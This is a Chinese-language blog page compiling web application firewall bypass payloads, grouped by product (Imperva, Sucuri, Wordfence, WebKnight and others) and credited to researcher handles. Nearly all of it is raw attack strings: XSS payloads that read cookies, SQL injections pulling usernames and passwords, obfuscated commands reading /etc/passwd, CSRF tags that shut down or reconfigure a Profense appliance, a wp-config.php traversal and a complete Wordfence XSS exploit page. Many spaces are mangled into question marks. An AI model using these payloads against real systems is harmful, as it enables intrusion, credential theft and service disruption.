%0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201

Imperva

Imperva SecureSphere 13 - Remote Command Execution?by?@rsp3ar

XSS Bypass by?@David Y

XSS Bypass by?@Emad Shanab

XSS Bypass by?@WAFNinja

%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E

XSS Bypass by?@i_bo0om

XSS Bypass by?@c0d3g33k

SQLi Bypass by?@DRK1WI

15 and '1'=(SELECT?'1'?FROM?dual)?and?'0having'='0having'

SQLi by?@Giuseppe D’Amore

stringindatasetchoosen%%' and 1 = any (select?1?from?SECURE.CONF_SECURE_MEMBERS?where?FULL_NAME?like?'%%dministrator'?and?rownum<=1?and?PASSWORD?like?'0%')?and?'1%%'='1

Imperva SecureSphere <= v13 - Privilege Escalation?by?@0x09AL

Kona SiteDefender

HTML Injection?by?@sp1d3rs

%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E

XSS Bypass?by?@Jonathan Bouman

<body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"

XSS Bypass?by?@zseano

?"></script><base%20c%3D=href%3Dhttps:\mysite>

XSS Bypass by?@0xInfection

XSS Bypass?by?@sp1d3rs

%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E

XSS Bypass?by?@Frans Rosén

XSS Bypass?by?@Ishaq Mohammed

<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

Profense

GET Type CSRF Attack?by?@Michael Brooks?(>= v.2.6.2)

Turn off Proface Machine

<img?src=https://host:2000/ajax.html?action=shutdown>

Add a proxy

<img?src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>

XSS Bypass by?@Michael Brooks?(>= v.2.6.2)

https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>

XSS Bypass?by?@EnableSecurity?(>= v2.4)

%3CEvil%20script%20goes%20here%3E=%0AByPass %3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

QuickDefense

XSS Bypass by?@WAFNinja

?<input?type="search"?onsearch="aler\u0074(1)"> <details?ontoggle=alert(1)>

Sucuri

Smuggling RCE Payloads?by?@theMiddle

/???/??t+/???/??ss??

Obfuscating RCE Payloads?by?@theMiddle

;+cat+/e'tc/pass'wd c\\a\\t+/et\\c/pas\\swd

XSS Bypass?by?@Luka

"><input/onauxclick="[1].map(prompt)">

XSS Bypass?by?@Brute Logic

data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post> <input?type=hidden name=a?value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>"> <input?type=submit></form>

URLScan

Directory Traversal?by?@ZeQ3uL?(<= v3.1) (Only on ASP.NET)

http://host.com/test.asp?file=.%./bla.txt

WebARX

Cross Site Scripting by?@0xInfection

<a69/onauxclick=open&#40&#41>rightclickhere

WebKnight

Cross Site Scripting by?@WAFNinja

<isindex?action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)?type=image> <marquee/onstart=confirm(2)> <details?ontoggle=alert(1)> <div?contextmenu="xss">Right-Click Here<menu?id="xss"?onshow="alert(1)"> <img?src=x?onwheel=prompt(1)>

SQLi by?@WAFNinja

0?union(select?1,username,password from(users)) 0?union(select?1,@@hostname,@@datadir)

XSS Bypass by?@Aatif Khan?(v4.1)

<details?ontoggle=alert(1)> <div?contextmenu="xss">Right-Click Here<menu?id="xss"?onshow="alert(1)">

SQLi Bypass?by?@ZeQ3uL

10?a%nd?1=0/(se%lect top?1?ta%ble_name fr%om?info%rmation_schema.tables)

Wordfence

XSS Bypass by?@brute Logic

<a?href=javascript:alert(1)>

XSS Bypass by?@0xInfection

<a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At&colon;/**/alert()/**/>click

HTML Injection?by?@Voxel

http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

XSS Exploit?by?@MustLive?(>= v3.3.5)

<html> <head> <title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body?onLoad="document.hack.submit()"> <form?name="hack"?action="http://site/?_wfsf=unlockEmail"?method="post"> <input?type="hidden"?name="email" value="<script>alert(document.cookie)</script>"> </form> </body> </html>

Other XSS Bypasses

Apache Generic

Writing method type in lowercase by?@i_bo0om

get?/login HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0?(compatible; MSIE5.01; Windows NT)

IIS Generic

Tabs before method by?@i_bo0om

GET?/login.php?HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

總結

以上是生活随笔為你收集整理的干货|各种WAF绕过手法学习的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇：关于站库分离渗透思路总结
下一篇：干货|代码安全审计权威指南（附下载地址）